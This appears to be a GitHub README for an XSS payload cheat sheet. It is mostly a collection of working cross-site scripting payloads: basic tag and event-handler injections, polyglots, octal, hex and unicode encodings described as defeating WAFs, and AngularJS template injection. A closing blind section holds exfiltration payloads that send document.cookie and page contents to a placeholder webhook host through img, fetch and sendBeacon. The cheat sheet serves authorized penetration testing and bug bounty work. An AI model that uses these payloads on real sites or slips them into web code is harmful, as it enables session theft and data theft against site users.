lolyratul025/XSS-Payload-CheatSheet

XSS Payload Cheat Sheet (2025 Edition) 🛡️

Educational Use Only
These payloads are provided solely for authorized security testing, penetration testing, and bug bounty hunting. Always obtain explicit written permission before testing any system.

Why This Cheat Sheet?

A regularly updated, well-organized collection of modern XSS payloads that actually work in 2025 against real-world WAFs, CSPs, and filters. Perfect for bug bounty hunters, pentesters, and red teamers.

Payload Categories

1. Basic & Classic Payloads

15 payloads:
  1. <script>alert(1)</script>
  2. <img src=x onerror=alert(1)>
  3. <svg onload=alert(1)>
  4. <body onload=alert(1)>
  5. <iframe src=javascript:alert(1)></iframe>
  6. <input autofocus onfocus=alert(1)>
  7. <details open ontoggle=alert(1)>
  8. <marquee onstart=alert(1)>Loop</marquee>
  9. <video><source onerror=alert(1)>
  10. <audio src onerror=alert(1)>
  11. <img src=x onerror=alert(document.domain)>
  12. <svg><animate onbegin=alert(1) attributeName=x dur=1s>
  13. <math><mi onclick=alert(1)>XSS</mi></math>
  14. <table background="javascript:alert(1)">
  15. <link rel=stylesheet href="javascript:alert(1)">

2. Polyglots (Work in Multiple Contexts)

Extremely powerful, 10 payloads:
  1. javascript:alert(1)
  2. jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=alert(1)//'>
  3. "><script>alert(1)</script>
  4. '><img src=x onerror=alert(1)>
  5. </script><svg onload=alert(1)>
  6. <img src=x onerror=alert(1)//
  7. <details open ontoggle=alert(1)</details>
  8. ';alert(1);//
  9. ";alert(1);//
  10. <svg><script>alert1&lt;1&gt;</script>

3. Encoding & Obfuscation Bypass

WAF killers:
  1. <script>eval('\141\154\145\162\164(1)')</script> → octal
  2. <script>eval('\x61\x6c\x65\x72\x74(1)')</script> → hex
  3. <script>\u0061\u006c\u0065\u0072\u0074(1)</script> → unicode
  4. <img src=x onerror=eval('\x61\x6c\x65\x72\x74(1)')>
  5. <a href="javascript&#58;alert(1)">Click</a>
  6. <img src=x onerror=alert(String.fromCharCode(49))>
  7. <script src=data:,alert(1)></script>
  8. <script>alert1</script>
  9. %3Cscript%3Ealert(1)%3C/script%3E → URL encoded
  10. <svg/onload=alert(1)>

4. Event-Based (No User Interaction Required)

  1. <body onresize=alert(1)> (trigger with window.resizeTo(500,500))
  2. <body onpageshow=alert(1)>
  3. <body onfocus=alert(1)>
  4. <body onhashchange=alert(1)> + change #
  5. <details open ontoggle=alert(1)>
  6. <video autoplay onplay=alert(1)>
  7. <audio autoplay onplay=alert(1)>

5. Advanced & Framework-Specific

Angular, React, Vue, Bootstrap, etc.:
  1. {{constructor.constructor('alert(1)')()}} → AngularJS
  2. ${{alert(1)}} → Some template engines
  3. <xss onanimationstart=alert(1) class="animate__animated">
  4. <div onpointerover=alert(1)>Hover me</div>
  5. <iframe srcdoc="<svg onload=alert(1)>"></iframe>

6. Blind / Exfiltration Payloads

  1. <img src=https://your-webhook.com/?cookie= + document.cookie>
  2. <script>fetch('https://your-webhook.com/'+document.cookie)</script>
  3. <img src=x onerror=navigator.sendBeacon('https://your-webhook.com',document.body.innerHTML)>

How to Contribute

Found a new working payload in 2025–2026?
→ Open a Pull Request! I’ll review and merge quickly.

References & Credits

  • PortSwigger Web Security Academy
  • PayloadsAllTheThings by Swissky
  • OWASP XSS Filter Evasion Cheat Sheet
  • My own bug bounty reports (2025–2026)

Star ⭐ this repo if it helped you pop an alert() in a real bug bounty program!

Feel free to fork, improve, and share with the community.

Happy Hacking! 🔴🧑‍💻
